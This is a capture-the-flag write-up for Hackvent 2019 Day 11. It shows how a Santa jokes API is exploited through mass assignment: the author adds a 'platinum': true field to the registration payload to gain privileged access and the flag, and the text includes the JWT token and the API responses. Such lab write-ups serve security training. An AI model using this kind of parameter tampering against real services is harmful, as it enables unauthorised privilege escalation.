Hackvent 2019: Day 11
Challenge
HV19.11 Frolicsome Santa Jokes API
Introduction
The elves created an API where you get random jokes about santa.
Resources
Go and try it here: http://whale.hacking-lab.com:10101HTML file mirror: HV19-Day11-FSJA-API-Description.html
Solution
We have the spec for the FSJA API that the elves have made. We use Postman to play around with the API to get a feel for how it works.
Following the instructions, we are able to register a new user and authenticate to get a token.
We use the following payload for our user data:
{
"username": "mobeigi_test_1",
"password": "ABCDEFG123"
}Upon logging in with the /fsja/login endpoint we get a token which looks like this:
{
"message": "Token generated",
"code": 201,
"token": "eyJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjp7InVzZXJuYW1lIjoibW9iZWlnaV90ZXN0XzEiLCJwbGF0aW51bSI6ZmFsc2V9LCJleHAiOjE1NzYwNTk5MzQuNzgwMDAwMDAwfQ.pbVVcSUmcBEgsV1vYcUs4tVwchH5GP8SaHulTIczpac"
}The token looks like base64 encoded data. In fact, it happens to be a JWT token.
We finally use the /fsja/random endpoint to get a joke:
{
"joke": "People really act weird at Christmas time! What other time of year do you sit in front of a dead tree in the living room and eat nuts and sweets out of your socks?",
"author": "Author Unknown",
"platinum": false
}The platinum field stands out to me the most.
As a random hunch, I decide to register a user and provide the platinum field value in the payload myself like so:
{
"username": "mobeigi_test_2",
"password": "ABCDEFG123",
"platinum": true
}I generate another joke and the API kindly provides us with our flag:
{
"joke": "Congratulation! Sometimes bugs are rather stupid. But that's how it happens, sometimes. Doing all the crypto stuff right and forgetting the trivial stuff like input validation, Hohoho! Here's your flag: HV19{th3_cha1n_1s_0nly_as_str0ng_as_th3_w3ak3st_l1nk}",
"author": "Santa",
"platinum": true
}Flag:
HV19{th3_cha1n_1s_0nly_as_str0ng_as_th3_w3ak3st_l1nk}Bonus
This challenge also contained the solution to HV19.H3 Hidden Three